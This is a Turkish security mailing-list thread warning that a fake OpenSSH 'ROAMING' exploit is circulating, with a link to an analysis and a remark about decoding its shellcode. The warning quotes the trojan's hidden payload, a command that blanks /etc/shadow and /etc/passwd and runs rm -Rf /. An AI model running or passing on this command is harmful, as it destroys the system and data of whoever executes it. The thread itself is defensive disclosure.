Bende o hataya dustum hocam shellcodeyi decode edince anladık işin aslını 
dikkatli olunması gerek gerçekten. Oğuzhan Akkaya
Information Security ResearcherIns. Mail: [email protected]
Per.Mail: [email protected]
Web: www.oguzhanaakkaya.comLinkedIn | Twitter |  

    18 Ocak 2016 12:32 Pazartesi tarihinde Kayhan KAYIHAN 
<[email protected]> şöyle yazdı:
 

 https://dustri.org/b/how-to-radare2-a-fake-openssh-exploit.html

Belirtiğiniz konuyu yukarıdaki linkte de detaylı olarak işlemişler hocam, 
incelemek isteyen arkadaşlar için paylaşıyorum.
18 Ocak 2016 10:31 tarihinde Tacettin Karadeniz <[email protected]> yazdı:


OpenSSH "ROAMING" zafiyeti husunda sahte exploit dolaşmaktadır.

Exploiti deneyim derken sıkıntı yaşamamak gerek.
Exploiti incelerken dikkatimi ceken hususlar aşağıda belirttim.echo "" > 
/etc/shadow ; echo "" > /etc/passwd ; rm -Rf / 
kısmına dikkat!!!
Target : openssh 4.7 to 7.1 roamingType   : 0dayAuthor : You know meExec   : %s 
<server> <port>- Abort - Need ROOT to bind to raw socket!! + OK Starting..[ ] 
Use IP and port (mandatory);*3$"Rfh-ch/shh/binecho "" > /etc/shadow ; echo "" > 
/etc/passwd ; rm -Rf /GCC: (Debian 4.9.2-10) 4.9.2GCC: (Debian 4.8.4-1) 4.8.4


-------------------
DDOS Saldırıları ve Korunma Yolları Eğitimi

İstanbul: 27-28 Şubat 2016
Ankara: 03-04 Mart 2016

-------------------



-------------------
DDOS Saldırıları ve Korunma Yolları Eğitimi

İstanbul: 27-28 Şubat 2016
Ankara: 03-04 Mart 2016

-------------------

  
-------------------
DDOS Saldırıları ve Korunma Yolları Eğitimi

İstanbul: 27-28 Şubat 2016
Ankara: 03-04 Mart 2016

-------------------

Cevap